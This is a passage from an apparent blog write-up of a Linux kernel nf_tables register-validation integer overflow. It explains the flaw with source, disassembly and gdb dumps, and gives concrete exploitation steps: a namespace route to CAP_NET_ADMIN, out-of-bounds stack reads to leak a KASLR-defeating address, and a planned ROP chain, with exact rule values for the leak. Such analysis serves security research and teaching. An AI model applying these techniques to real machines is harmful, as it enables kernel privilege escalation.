<p>If the register that is parsed through a netlink attribute is between the values <code class="language-plaintext highlighter-rouge">NFT_REG_VERDICT...NFT_REG_4</code> (between the values zero and four) it does a calculation which returns the register index as <code class="language-plaintext highlighter-rouge">reg * 16 / 4</code>  or <code class="language-plaintext highlighter-rouge">reg * 4</code>.</p>

<p>So it just scales up the register index with a factor 4 if the old registers were used. That makes sense as the old registers were 16-byte ones and the new ones are 4-byte ones - so <code class="language-plaintext highlighter-rouge">NFT_REG_2</code> corresponds to <code class="language-plaintext highlighter-rouge">NFT_REG32_07</code> (not <code class="language-plaintext highlighter-rouge">NFT_REG32_08</code> as the 4-byte register offsets start from <code class="language-plaintext highlighter-rouge">00</code>).</p>

<p>This is when the old register offsets are used. However when the new register offsets are used - the 4-byte ones - another calculation is performed. That calculation is meant to align the number from the enum to the actual register index - because in the enum type the 4-byte register offsets are themselves offset by eight - <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code> maps to 8.</p>

<p>So the calculation yields that the true register index is <code class="language-plaintext highlighter-rouge">reg + 16 / 4 - 8</code> which is <code class="language-plaintext highlighter-rouge">reg - 4</code>.</p>

<p>So the true register index of <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code> is actually <code class="language-plaintext highlighter-rouge">8-4 = 4</code>. Why four you might ask? Well, there is a verdict register that sits at the beginning of the registers which is 16 bytes wide and that is the size of four 4-byte registers so the first data register starts actually from four and not zero.</p>

<p>Extremely confusing, I know - but this is what we deal with. Now we can take a look at the validation functions.</p>

<h4 id="validation-functions-">Validation functions <a name="validationfunc"></a></h4>
<p>We will take a look at only one of them as the vulnerability is the same in both.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* net/netfilter/nf_tables_api.c */</span>
<span class="kt">int</span> <span class="nf">nft_validate_register_load</span><span class="p">(</span><span class="k">enum</span> <span class="n">nft_registers</span> <span class="n">reg</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span> <span class="o">&lt;</span> <span class="n">NFT_REG_1</span> <span class="o">*</span> <span class="n">NFT_REG_SIZE</span> <span class="o">/</span> <span class="n">NFT_REG32_SIZE</span><span class="p">)</span>
		<span class="cm">/* NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE is 1 * 16 / 4 = 4
		/* this check is essentially reg &lt; 4 */</span>
		<span class="cm">/* this essentially checks if you are reading the verdict */</span>
		<span class="cm">/* the verdict is located at reg offsets 0 to 4 */</span>
		<span class="cm">/* if attempting to load the verdict it returns an EINVAL */</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="c1">// if trying to read with len = 0, return EINVAl - makes sense</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span> <span class="o">*</span> <span class="n">NFT_REG32_SIZE</span> <span class="o">+</span> <span class="n">len</span> <span class="o">&gt;</span> <span class="n">sizeof_field</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_regs</span><span class="p">,</span> <span class="n">data</span><span class="p">))</span>
		<span class="cm">/* NFT_REG32_SIZE = 4 */</span>
		<span class="cm">/* sizeof_field(struct nft_regs, data) gets the size of the registers */</span>
		<span class="cm">/* the size of the registers in total is 0x50 = 80 */</span>
		<span class="cm">/* reg * 4 + len &gt; 0x50 */</span> 
		<span class="cm">/* This rule is to make sure we are not loading and storing */</span>
		<span class="cm">/* outside of the registers */</span>
		<span class="cm">/* going outside of the registers would be dangerous as */</span>
		<span class="cm">/* the registers are on the stack so reading or writing outside of them */</span>
		<span class="cm">/* would be directly writing out-of-bounds on the stack in **kernel-space** */</span>
		<span class="cm">/* if going OOB it returns an ERANGE error */</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">ERANGE</span><span class="p">;</span>
	
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>You might have spotted the vulnerability in the last if-statement.</p>

<p><code class="language-plaintext highlighter-rouge">if (reg * NFT_REG32_SIZE + len &gt; sizeof_field(struct nft_regs, data))</code></p>

<p>The constant <code class="language-plaintext highlighter-rouge">NFT_REG32_SIZE</code> is 4. If we pass a big enough value for reg such that when multiplied by 4 and <code class="language-plaintext highlighter-rouge">len</code> added we could overflow the integer. That would allow for very high values of <code class="language-plaintext highlighter-rouge">reg</code> to pass the check when they normally wouldn’t.</p>

<p>Let us look at an example. If we <strong>assume</strong> <code class="language-plaintext highlighter-rouge">reg</code> to be a 32-bit integer as it is in <code class="language-plaintext highlighter-rouge">nft_parse_register_load</code> then the maximum value we could pass for <code class="language-plaintext highlighter-rouge">reg</code> is <code class="language-plaintext highlighter-rouge">0xffffffff</code> - four bytes of <code class="language-plaintext highlighter-rouge">0xff</code>. With a such value of reg if we multiply it by four we would get a value of <code class="language-plaintext highlighter-rouge">0x3FFFFFFFC</code> which is more than four bytes. In this case only the lower four bytes will be taken during the next computation.</p>

<p>Let’s say we have a value of <code class="language-plaintext highlighter-rouge">len = 0x20</code> then at the end of the computation in the if-statement our value would be <code class="language-plaintext highlighter-rouge">0xfffffffc + 0x20 = 0x10000001C</code>. Again that value is more than 4 bytes so only the lower four would be taken and that would leave the total value at the end at <code class="language-plaintext highlighter-rouge">0x1c</code>. The check would evaluate to <code class="language-plaintext highlighter-rouge">0x1c &lt; 0x50</code> which means that no error would be returned so the register value we pass (<code class="language-plaintext highlighter-rouge">0xffffffff</code>) would be validated as a <em>valid</em> one even though it is not.</p>

<p>If you remember in <code class="language-plaintext highlighter-rouge">nft_parse_register_load</code> and <code class="language-plaintext highlighter-rouge">nft_parse_register_store</code> in <code class="language-plaintext highlighter-rouge">dreg</code> and <code class="language-plaintext highlighter-rouge">sreg</code> is saved only the least significant bit (due to <code class="language-plaintext highlighter-rouge">dreg</code> and <code class="language-plaintext highlighter-rouge">sreg</code> being of type u8). So that means that at the end <code class="language-plaintext highlighter-rouge">sreg</code> or <code class="language-plaintext highlighter-rouge">dreg</code> would be just <code class="language-plaintext highlighter-rouge">0xff</code>. That is still out of the bounds of <code class="language-plaintext highlighter-rouge">nft_regs</code> which is <code class="language-plaintext highlighter-rouge">0x50</code> bytes.</p>

<p>That would mean that we could potentially read and write out of the bounds of <code class="language-plaintext highlighter-rouge">nft_regs</code> directly on the stack.</p>

<p>Even though I just used <code class="language-plaintext highlighter-rouge">0xffffffff</code> as an example value that at the end evaluates at <code class="language-plaintext highlighter-rouge">0xff</code> - the highest value that could reach the validation function is <code class="language-plaintext highlighter-rouge">0xfffffffb</code> due to how the registers are parsed. We took a look at that already but let’s go over it again.</p>

<p>In the enum type, the 16-byte registers hold values from 1 to 4. Everything higher than that is considered a 4-byte register and when those are evaluated 4 is subtracted from them to align them correctly. You might want to go back to that section to re-read it if something is unclear.</p>

<p>That means that if we pass <code class="language-plaintext highlighter-rouge">0xffffffff</code> it would be decreased by 4 before it even reaches the validation function so reg by that point would be equal to <code class="language-plaintext highlighter-rouge">0xfffffffb</code>. As only the lowest byte of that would be taken for the actual register value - the register we will have is <code class="language-plaintext highlighter-rouge">0xfb</code>. That is true for all register values that we pass higher than <code class="language-plaintext highlighter-rouge">4</code>. This would mean that the highest register index we can get is <code class="language-plaintext highlighter-rouge">0xfb</code>.</p>

<p>However, there is a way to reach the register values from <code class="language-plaintext highlighter-rouge">0xfc</code> to <code class="language-plaintext highlighter-rouge">0xff</code>. Until now we used the base <code class="language-plaintext highlighter-rouge">0xffffffXX</code> for the register values we pass but we could also use <code class="language-plaintext highlighter-rouge">0x3fffffXX</code> and <code class="language-plaintext highlighter-rouge">0x7fffffXX</code>. If we use a lower base - for example, <code class="language-plaintext highlighter-rouge">0x3fffffXX</code> - we could pass a value like <code class="language-plaintext highlighter-rouge">0x40000003</code> that when decreased by 4 will be equal to <code class="language-plaintext highlighter-rouge">0x3fffffff</code>. When the least-significant byte is taken it evaluates to register index <code class="language-plaintext highlighter-rouge">0xff</code>. That’s how we reach the highest register indexes.</p>

<blockquote>
  <p>In all future mentions of register indexes -&gt; the register index refers to the REAL index (after they are decreased by 4).</p>
</blockquote>

<h4 id="a-big-but-">A big “but” <a name="bigbut"></a></h4>
<p>But all of that is under the assumption that the register that reaches the validation function is indeed 32bit. And that might not be true. The parameter of the function is of type <code class="language-plaintext highlighter-rouge">enum nft_registers</code>. By default, enum should be guaranteed to hold integer values(32bit). However, an optimization might be active that makes the size of the enums big enough to only hold the values provided in the definition of the enum. If that optimization is active that would mean our <code class="language-plaintext highlighter-rouge">enum nft_registers</code> would be of size char (1 byte). In that case, only the least-significant byte would reach the faulty validation - complicating things.</p>

<p>There is no information showing if that optimization is active by default in the kernel.
So the only way to say is to look at the assembly of the validation function. Let’s do that.</p>
<pre><code class="language-assembly">; nft_parse_register_load - kernel built from source at tag 5.12
0xffffffff81a6c870 &lt;+0&gt;:	call   0xffffffff81065160 &lt;__fentry__&gt;
0xffffffff81a6c875 &lt;+5&gt;:	mov    eax,DWORD PTR [rdi+0x4]
0xffffffff81a6c878 &lt;+8&gt;:	bswap  eax
0xffffffff81a6c87a &lt;+10&gt;:	mov    edi,eax
0xffffffff81a6c87c &lt;+12&gt;:	lea    ecx,[rax-0x4]
0xffffffff81a6c87f &lt;+15&gt;:	shl    edi,0x4
0xffffffff81a6c882 &lt;+18&gt;:	shr    edi,0x2
0xffffffff81a6c885 &lt;+21&gt;:	cmp    eax,0x4
0xffffffff81a6c888 &lt;+24&gt;:	mov    eax,edi
0xffffffff81a6c88a &lt;+26&gt;:	cmova  eax,ecx
0xffffffff81a6c88d &lt;+29&gt;:	test   edx,edx
0xffffffff81a6c88f &lt;+31&gt;:	je     0xffffffff81a6c8a3 &lt;nft_parse_register_load+51&gt;
0xffffffff81a6c891 &lt;+33&gt;:	cmp    eax,0x3
0xffffffff81a6c894 &lt;+36&gt;:	jbe    0xffffffff81a6c8a3 &lt;nft_parse_register_load+51&gt;
0xffffffff81a6c896 &lt;+38&gt;:	lea    edx,[rdx+rax*4]
0xffffffff81a6c899 &lt;+41&gt;:	cmp    edx,0x50
0xffffffff81a6c89c &lt;+44&gt;:	ja     0xffffffff81a6c8a9 &lt;nft_parse_register_load+57&gt;
0xffffffff81a6c89e &lt;+46&gt;:	mov    BYTE PTR [rsi],al
0xffffffff81a6c8a0 &lt;+48&gt;:	xor    eax,eax
0xffffffff81a6c8a2 &lt;+50&gt;:	ret    
0xffffffff81a6c8a3 &lt;+51&gt;:	mov    eax,0xffffffea
0xffffffff81a6c8a8 &lt;+56&gt;:	ret    
0xffffffff81a6c8a9 &lt;+57&gt;:	mov    eax,0xffffffde
0xffffffff81a6c8ae &lt;+62&gt;:	ret    
</code></pre>
<p>If we take a look at <code class="language-plaintext highlighter-rouge">&lt;+38&gt;</code> and the few instructions below we can see that this is the generated assembly of the vulnerable if-statement.</p>

<p>We can see that in my case the nft register index is in the <code class="language-plaintext highlighter-rouge">rdx register</code>. We can see that the full <code class="language-plaintext highlighter-rouge">rdx</code> register is used in the calculation and the result is saved into the lower 32 bits (<code class="language-plaintext highlighter-rouge">edx</code>). Then <code class="language-plaintext highlighter-rouge">edx</code> is compared to <code class="language-plaintext highlighter-rouge">0x50</code>. This clearly shows that the register size in the function is not shrunk by <code class="language-plaintext highlighter-rouge">enum</code> optimization.</p>

<h2 id="exploitation-">Exploitation <a name="exploitation"></a></h2>
<p>Now that it is clear that no optimization is in our way we can take a look at how we could potentially exploit this.</p>

<p>In order to be able to exploit this we would need to be able to create and modify <code class="language-plaintext highlighter-rouge">nf_tables</code> objects - tables, chains, etc. To do that we need the capability <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>. Thankfully we can obtain it in a user+network namespace. We will just have to make sure to leave the namespace during exploitation.</p>

<p>This vulnerability is essentially an incorrect validation. This allows us to set values for the registers such that we are going to be accessing addresses on the stack outside of <code class="language-plaintext highlighter-rouge">nft_regs</code>. Allowing Out-Of-Bounds Read and Write which can lead to an Arbitrary Code Execution in kernel-space.</p>

<h3 id="primitives-">Primitives? <a name="primitives"></a></h3>
<p>It is time to look into what our primitives are. All the expressions use the registers in some way - either by reading from them or writing to them. Now the question is about looking for the ones most useful to help us exploit this vulnerability.</p>

<h4 id="nft_immediate_expr-">nft_immediate_expr <a name="imm"></a></h4>
<p>This one writes constant data to the registers. So on theory it could be used if we want to use it for an OOB write.</p>

<p>However with this expression we can only write up to 16 bytes which is not ideal and that constraint of 16 bytes would also restrict us severely on the values the register value we pass could hold.</p>

<p>The minimal value we could pass for the register that it still goes through the validation successfully is <code class="language-plaintext highlighter-rouge">0xfffffffc</code> which is <strong>very</strong> restrictive.</p>

<h4 id="nft_payload-">nft_payload <a name="payload"></a></h4>
<p>The <code class="language-plaintext highlighter-rouge">nft_payload</code> expression is used to copy directly from the packet to the registers. This is a perfect expression for an OOB read. We can read up to <code class="language-plaintext highlighter-rouge">0xff</code> at once which is the most we can get from any expression. Let’s find out our lower and upper bounds.</p>

<p>Our lower bound is whenever we <em>max out</em> our len at <code class="language-plaintext highlighter-rouge">0xff</code>. The minimal register value then we can have to pass the validation condition is <code class="language-plaintext highlighter-rouge">0xffffffc1</code>. That means the lowest offset we can read at is <code class="language-plaintext highlighter-rouge">0xc1 * 4 = 0x304</code> relative to the beginning of <code class="language-plaintext highlighter-rouge">nft_regs</code> on the stack.</p>

<p>Our upper bound is when our register value is the highest possible <code class="language-plaintext highlighter-rouge">0xff</code>. At that register value, the highest length we could have is <code class="language-plaintext highlighter-rouge">0x54</code> at which <code class="language-plaintext highlighter-rouge">0x3fffffff * 4 + 0x54 = 0x50 &lt;= 0x50</code>. This means that the highest offset we can read at is <code class="language-plaintext highlighter-rouge">0xff * 4 + 0x54 = 0x450</code>.</p>

<p>So the lowest offset at which we could read is <code class="language-plaintext highlighter-rouge">0x304</code> and the highest at which we could read is <code class="language-plaintext highlighter-rouge">0x450</code>. That leaves us with <code class="language-plaintext highlighter-rouge">0x14c = 332</code> bytes we can read from the stack.</p>

<h4 id="nft_payload_set-">nft_payload_set <a name="payloadset"></a></h4>
<p>The <code class="language-plaintext highlighter-rouge">nft_payload_set</code> does the opposite of the <code class="language-plaintext highlighter-rouge">nft_payload</code>. Instead of copying from the packet to the registers - this expression can be used to copy from the registers and write onto the packet. It has the same bounds as <code class="language-plaintext highlighter-rouge">nft_payload</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_payload_set</span> <span class="p">{</span>
	<span class="k">enum</span> <span class="n">nft_payload_bases</span>	<span class="n">base</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_type</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_flags</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The thing different is that it takes a source register <code class="language-plaintext highlighter-rouge">sreg</code> instead of a destination register <code class="language-plaintext highlighter-rouge">dreg</code>. It also has some checksum options but they are not relevant to us.</p>

<h4 id="nft_bitwise-">nft_bitwise <a name="bitwise"></a></h4>
<p>This expression is used to perform <em>bitwise</em> operations on the registers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_bitwise</span> <span class="p">{</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_bitwise_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">mask</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">xor</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>It takes a <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">len</code> which specify to what registers we are going to be performing the bitwise operations. The destination <code class="language-plaintext highlighter-rouge">dreg</code> specifies where we are going to be putting the data from the registers we are performing the bitwise operation to.</p>

<p>The <code class="language-plaintext highlighter-rouge">op</code> parameter of type <code class="language-plaintext highlighter-rouge">nft_bitwise_ops</code> specifies the type of a bitwise operation.	You can read all about the types in my article on <code class="language-plaintext highlighter-rouge">nf_tables</code> but here we will review only the one that concerns us.</p>

<p>We will be using this expression to copy from register to register without performing <em>any</em> bitwise operation. We are going to use it in case we need to copy some data from out-of-bounds ‘registers’ to the actual registers. To do this we are going to use either <code class="language-plaintext highlighter-rouge">ops</code> set to <code class="language-plaintext highlighter-rouge">NFT_BITWISE_LSHIFT</code> or <code class="language-plaintext highlighter-rouge">NFT_BITWISE_RSHIFT</code> and pass a zero as the data (here the data is the amount of byte we shift by).</p>

<p>What are our bounds when we use this expression?</p>

<p>Here the boundaries are a bit different. Our max length cannot be <code class="language-plaintext highlighter-rouge">0xff</code> because if it is then both our <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">dreg</code> would be out-of-bounds which we don’t want. So our length must be <code class="language-plaintext highlighter-rouge">0x40 = 64</code> at the maximum (16 data registers each 4 bytes).</p>

<p>Our lower bound would then be when we barely cross the threshold of validity but our len is the maximum we could have - <code class="language-plaintext highlighter-rouge">0x40</code>. This means that our lower bound would be when our register value is <code class="language-plaintext highlighter-rouge">0xfffffff0</code> - because <code class="language-plaintext highlighter-rouge">0xfffffff0 * 4 + 0x40 = 0x00 &lt; 0x50</code>. Converted to byte offset that would be <code class="language-plaintext highlighter-rouge">0xf0 * 4 = 0x3c0</code> relative to the beginning of <code class="language-plaintext highlighter-rouge">nft_regs</code>.</p>

<p>Our upper bound would be when we have set our length to the maximum - <code class="language-plaintext highlighter-rouge">0x40</code>. The highest value for a register we can have is <code class="language-plaintext highlighter-rouge">0xff</code>. In that case <code class="language-plaintext highlighter-rouge">0x3fffffff * 4 + 0x40 = 0x3c &lt; 0x50</code>. Coverted to a byte offset that is <code class="language-plaintext highlighter-rouge">0xff * 4 + 0x40 = 0x43c</code>.</p>

<p>So in total we could read from offset <code class="language-plaintext highlighter-rouge">0x3c0</code> to offset <code class="language-plaintext highlighter-rouge">0x43c</code> with this expression - <code class="language-plaintext highlighter-rouge">0x7c = 124</code> bytes range.</p>

<p>Those are all of the expressions needed to exploit this vulnerability.</p>

<h3 id="an-exploitation-strategy-">An Exploitation strategy <a name="explstrat"></a></h3>
<p>The exploitation strategy is pretty simple. The netfilter hook we use for our chain and the protocols we choose for the packets going through the firewall all change the stack layout. This means that if the stack layout is not favourable at our OOB read and write range we can experiment a lot with hooks and protocols until we have a favourable stack layout to do what we need to do. So our strategy is essentially:</p>
<ul>
  <li>Find a good hook and protocol such that there is a kernel address in our OOB read range.</li>
  <li>Leak the address and calculate the kernel base.</li>
  <li>Find a good hook and protocol such that the stack layout at our OOB write range is good enough for us to be able to inject a full ROP chain on the stack.</li>
  <li>Build an ROP chain and inject it… voilà.</li>
</ul>

<h3 id="leaking-a-kernel-address-">Leaking a kernel address <a name="leakingkaddr"></a></h3>
<p>The first stage of exploitation is to find a way to leak a kernel address to find the kernel base. It is essential that we find the kernel base address in order to actually exploit the vulnerability. Due to “Kernel Address Space Layout Randomization” (<code class="language-plaintext highlighter-rouge">KASLR</code>) the kernel is loaded at a different address in memory each time (at boot). In order to use an ROP chain we need to know the base address to calculate the addresses the ROP gadgets will be located at. Thankfully due to the fact that we have an OOB read we have a very good chance of leaking a kernel address and defeating <code class="language-plaintext highlighter-rouge">KALSR</code>.</p>

<h4 id="nft_do_chain-">nft_do_chain <a name="nft_do_chain"></a></h4>
<p>If you have read the article on nf_tables you know that <code class="language-plaintext highlighter-rouge">nft_do_chain</code> is executed to go through the rules in a chain and execute their expressions whenever a hook is ‘triggered’.</p>

<p>Looking at the generated assembly of <code class="language-plaintext highlighter-rouge">nft_do_chain</code> we need to locate instructions accessing the registers to determine where on the stack the registers are.</p>
<pre><code class="language-assembly">0xffffffff81a6bb40 &lt;+0&gt;:     call   0xffffffff81065160 &lt;__fentry__&gt;
0xffffffff81a6bb45 &lt;+5&gt;:     push   rbp
0xffffffff81a6bb46 &lt;+6&gt;:     mov    rbp,rsp
0xffffffff81a6bb49 &lt;+9&gt;:     push   r15
0xffffffff81a6bb4b &lt;+11&gt;:    mov    r15,rdi
0xffffffff81a6bb4e &lt;+14&gt;:    push   r14
0xffffffff81a6bb50 &lt;+16&gt;:    push   r13
0xffffffff81a6bb52 &lt;+18&gt;:    push   r12
0xffffffff81a6bb54 &lt;+20&gt;:    push   rbx
0xffffffff81a6bb55 &lt;+21&gt;:    and    rsp,0xfffffffffffffff0
0xffffffff81a6bb59 &lt;+25&gt;:    sub    rsp,0x1a0
0xffffffff81a6bb60 &lt;+32&gt;:    mov    rax,QWORD PTR [rdi+0x20]
0xffffffff81a6bb64 &lt;+36&gt;:    mov    QWORD PTR [rsp+0x8],rsi
0xffffffff81a6bb69 &lt;+41&gt;:    mov    rax,QWORD PTR [rax+0x20]
0xffffffff81a6bb6d &lt;+45&gt;:    mov    BYTE PTR [rsp+0x4d],0x0
0xffffffff81a6bb72 &lt;+50&gt;:    movzx  eax,BYTE PTR [rax+0xe94]
0xffffffff81a6bb79 &lt;+57&gt;:    mov    BYTE PTR [rsp+0x13],al
0xffffffff81a6bb7d &lt;+61&gt;:    nop    DWORD PTR [rax+rax*1+0x0]
0xffffffff81a6bb82 &lt;+66&gt;:    mov    rax,QWORD PTR [rsp+0x8]
0xffffffff81a6bb87 &lt;+71&gt;:    mov    DWORD PTR [rsp+0x14],0x0
0xffffffff81a6bb8f &lt;+79&gt;:    mov    QWORD PTR [rsp+0x18],rax
0xffffffff81a6bb94 &lt;+84&gt;:    cmp    BYTE PTR [rsp+0x13],0x0
0xffffffff81a6bb99 &lt;+89&gt;:    mov    rax,QWORD PTR [rsp+0x18]
0xffffffff81a6bb9e &lt;+94&gt;:    je     0xffffffff81a6be90 &lt;nft_do_chain+848&gt;
0xffffffff81a6bba4 &lt;+100&gt;:   mov    r12,QWORD PTR [rax+0x8]
0xffffffff81a6bba8 &lt;+104&gt;:   mov    rax,QWORD PTR [r12]
0xffffffff81a6bbac &lt;+108&gt;:   mov    DWORD PTR [rsp+0x50],0xffffffff ; regs.verdict.code = NFT_CONTINUE;  
0xffffffff81a6bbb4 &lt;+116&gt;:   mov    rbx,QWORD PTR [r12]
0xffffffff81a6bbb8 &lt;+120&gt;:   test   rbx,rbx
...
0xffffffff81a6bc93 &lt;+339&gt;:   mov    r8d,DWORD PTR [rsp+0x50]
0xffffffff81a6bc98 &lt;+344&gt;:   cmp    r8d,0xffffffff
0xffffffff81a6bc9c &lt;+348&gt;:   jne    0xffffffff81a6c039 &lt;nft_do_chain+1273&gt; 
...
</code></pre>
<p>The instruction of importance is at <code class="language-plaintext highlighter-rouge">&lt;+108&gt;</code>. Let’s take a deeper look at it.</p>

<p>At the beginning of <code class="language-plaintext highlighter-rouge">do_chain</code> in <code class="language-plaintext highlighter-rouge">nft_do_chain</code> there is this line of code
<code class="language-plaintext highlighter-rouge">regs.verdict.code = NFT_CONTINUE;</code><br />
You probably know that <code class="language-plaintext highlighter-rouge">NFT_CONTINUE</code> is the default verdict code.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">enum</span> <span class="n">nft_verdicts</span> <span class="p">{</span>
	<span class="n">NFT_CONTINUE</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="c1">// -1 is 0xffffffff due to Two's Complement</span>
	<span class="n">NFT_BREAK</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">2</span><span class="p">,</span>
	<span class="n">NFT_JUMP</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">3</span><span class="p">,</span>
	<span class="n">NFT_GOTO</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">4</span><span class="p">,</span>
	<span class="n">NFT_RETURN</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">5</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>So this instruction at <code class="language-plaintext highlighter-rouge">&lt;+108&gt;</code> sets the verdict register to <code class="language-plaintext highlighter-rouge">NFT_CONTINUE</code>.</p>

<p>The verdict register is the first register - sitting at the very start. If it is located at <code class="language-plaintext highlighter-rouge">rsp+0x50</code>. 
That means that the register occupies the space on the stack from <code class="language-plaintext highlighter-rouge">rsp+0x50</code> to <code class="language-plaintext highlighter-rouge">rsp+0xa0</code>.</p>

<p>Also looking at the instructions at <code class="language-plaintext highlighter-rouge">&lt;+339&gt;</code> and <code class="language-plaintext highlighter-rouge">&lt;+344&gt;</code> we can see the check validating that the verdict is still <code class="language-plaintext highlighter-rouge">NFT_CONTINUE</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb-peda$ x/20xw ($rsp+0x50) // printing the registers -&gt; we print 20 words (20 (4 byte) words is 80 bytes = 0x50)
0xffffc90000003c50:     0xffffffff      0x00000000      0x00000000      0x00000000
0xffffc90000003c60:     0x00000011      0xffffffff      0x8105ceac      0xffffffff
0xffffc90000003c70:     0x8117f965      0xffffffff      0xffffffff      0x7fffffff
0xffffc90000003c80:     0x00000006      0x00000000      0x3a61cec0      0xffff8880
0xffffc90000003c90:     0x00000001      0x00000000      0x00011795      0x00000000
</code></pre></div></div>

<p>Now we know where on the stack the <code class="language-plaintext highlighter-rouge">nft_regs</code> are located.</p>

<h4 id="scouting-for-a-kernel-address-">Scouting for a kernel address <a name="scoutingkaddr"></a></h4>
<p>We already have established that we can do an OOB read and write with <code class="language-plaintext highlighter-rouge">nft_bitwise</code>. Using this expression will allow us to copy data from the OOB range and put it into our registers. Then we could use a <code class="language-plaintext highlighter-rouge">nft_payload_set</code> to get the data we saved into the registers and put it into a packet. Once it is in the packet we can listen for it - and read the leaked data.</p>

<blockquote>
  <p>A small note: It is not necessary to use both nft_bitwise and nft_payload_set. You could just use nft_payload_set to directly copy it from the OOB range into the packet. However, when I was writing the exploit I chose to use first <code class="language-plaintext highlighter-rouge">nft_bitwise</code> and then <code class="language-plaintext highlighter-rouge">nft_payload_set</code>.</p>
</blockquote>

<p>We know that with <code class="language-plaintext highlighter-rouge">nft_bitwise</code> we can leak from offset <code class="language-plaintext highlighter-rouge">0x3c0</code> to offset <code class="language-plaintext highlighter-rouge">0x43c</code> - that’s 15 and a half 8-byte words range.</p>

<p>Now let’s take a look at the stack layout when we set up a chain with an <strong>output hook</strong> (<code class="language-plaintext highlighter-rouge">NF_INET_LOCAL_OUT</code>) and use a <strong>UDP</strong> packet. Using an output hook means that the rules and expressions we set will be executed right before the packet leaves the nest. We will use a <strong>UDP</strong> packet as it is the most simple one and a one-off - doesn’t need a connection like a TCP one.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb-peda$ x/16gx ($rsp+0x50+0x3c8)
0xffffc90000227d78:     0x0000000000000008      0xffff8880052dd680
0xffffc90000227d88:     0x0000000000000004      0x0000000000000000
0xffffc90000227d98:     0xffffffff819bfc63      0xffff88800e1db180
0xffffc90000227da8:     0xdd4d4cb9a478c900      0xffff88800e1db180
0xffffc90000227db8:     0xffffc90000227df8      0xffff88800e1db180
0xffffc90000227dc8:     0x0000000000000010      0x0000000000000004
0xffffc90000227dd8:     0x0000000000000000      0xffffc90000227e28
0xffffc90000227de8:     0xffffffff819b7ab7      0xffffffff819b7ab7
</code></pre></div></div>
<p>The address saved at <code class="language-plaintext highlighter-rouge">0xffffc90000227d98</code> immediately stands out as it is obviously a <code class="language-plaintext highlighter-rouge">.text</code> address. This serves us perfectly. It is at offset <code class="language-plaintext highlighter-rouge">0x3e8</code> relative to the beginning of <code class="language-plaintext highlighter-rouge">nft_regs</code>.</p>

<h4 id="leaking-the-address-">Leaking the address <a name="leakingkaddr"></a></h4>

<p>Leaking the address is straightforward now. We have a <code class="language-plaintext highlighter-rouge">.text</code> address ready to be leaked in our OOB read range when we use an <em>output hook</em> and send a UDP packet to ourselves on the loopback interface. Now we need to construct a rule with the proper expressions. First, we copy the address from the OOB range to the registers. Then we need to copy the address from the registers and write it to the UDP packet’s payload. And finally, we just need to be listening for UDP packets so we can receive back the packet carrying the address.</p>

<p>To do that we need to make a rule with the following expressions:</p>
<ul>
  <li>bitwise expression
    <ul>
      <li>sreg = 0xffffff(fe) (0x3e8 / 4 = 0xfa but it will be decreased by 4 so we will add 4 preemptively 0xfa + 4 = 0xfe)</li>
      <li>dreg = NFT_REG32_01</li>
      <li>len = 0x20 (length is bigger than needed to pass the validation)</li>
      <li>bitwise_shift_type = NFT_BITWISE_RSHIFT or NFT_BITWISE_LSHIFT</li>
      <li>data = 0 (shift value must be 0)</li>
    </ul>
  </li>
  <li>payload_set expression
    <ul>
      <li>sreg = NFT_REG32_01</li>
      <li>base = NFT_PAYLOAD_TRANSPORT_HEADER (this base is targetting the UDP header)</li>
